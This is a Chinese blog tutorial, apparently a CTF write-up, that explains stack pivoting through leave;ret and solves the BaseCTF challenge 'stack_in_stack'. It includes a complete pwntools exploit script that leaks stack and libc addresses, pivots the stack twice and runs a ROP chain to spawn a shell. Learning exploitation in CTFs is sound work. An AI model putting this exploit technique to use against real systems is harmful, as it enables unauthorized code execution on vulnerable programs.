栈迁移(详解)

栈迁移

原理

栈迁移主要利用了leave_ret这个指令

leave返回上级函数时,恢复原本的栈空间leavemov esp,ebp pop ebp
ret返回上级函数后,执行上级函数的命令ret等同于 pop eip (不存在这样的指令
esp
'''
ebp
ret

在函数的先执行到leave指令时,会将ebp处填充的地址pop到ebp中去,这样栈基地址发生了变化,在下次的栈位置就会发生变化

请添加图片描述

有个图对这些指令变化阐述的比较清楚

来自栈迁移的原理&&实战运用 - ZikH26 - 博客园 (cnblogs.com)

请添加图片描述

请添加图片描述

例题

basectf week3 stack_in_stack

想要赛后要附件的师傅可以加我

请添加图片描述
请添加图片描述

请添加图片描述

通过这里的动态调式才发现溢出了0x10个字节,故通过栈迁移来进行

第一个read
payload=(p64(gift)+p64(main)).ljust(0x30,b'\x00') 
payload+=p64(leak-0X8)+p64(leave_ret)  

p.send(payload)

统一解释一下这个leave_ret

下面的步骤大概是这样的

请添加图片描述

请添加图片描述

请添加图片描述

请添加图片描述

请添加图片描述

请添加图片描述

exp

from pwn import *
from LibcSearcher import *
#p = process('./pwn')
p=remote('challenge.basectf.fun',32210)
context(log_level='debug')
elf = ELF('./pwn')
#libc=ELF('./libc.so.6')
#libc=elf.libc
#gdb.attach(p)
#pause()
main=0x4010e0
gift=0x4011c6
leave_ret=0x4012f2

p.recvuntil('mick0960.\n')
leak=int(p.recv(14),16)
print(hex(leak))

payload=(p64(gift)+p64(main)).ljust(0x30,b'\x00')
payload+=p64(leak-0X8)+p64(leave_ret)

p.send(payload)

p.recvuntil(b'You found the secret!\n')
p.recvuntil(b'0x')
puts=int(p.recv(12),16)
print(hex(puts))

p.recvuntil(b'mick0960.\n')
leak2 = int(p.recv(14), 16)
libc=LibcSearcher("puts",puts)

'''
libc_base=puts - elf.symbols['puts']

print(hex(libc_base))
read=libc_base+elf.symbols['read']
print(hex(read))

bin_sh_addr=libc_base+next(libc.search(b'/bin/sh'))
system_addr=libc_base+libc.sym['system']
'''
libc_base=puts-libc.dump('puts')
system_addr=libc_base+libc.dump('system')
bin_sh_addr=libc_base+libc.dump('str_bin_sh')

pop_rdi=libc_base+0x2a3e5
payload1=(p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)).ljust(0x30,b'a')
payload1+=p64(leak2-0x8)+p64(leave_ret)
#p.recvuntil(b'mick0960.\n')
p.send(payload1)
p.interactive()

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值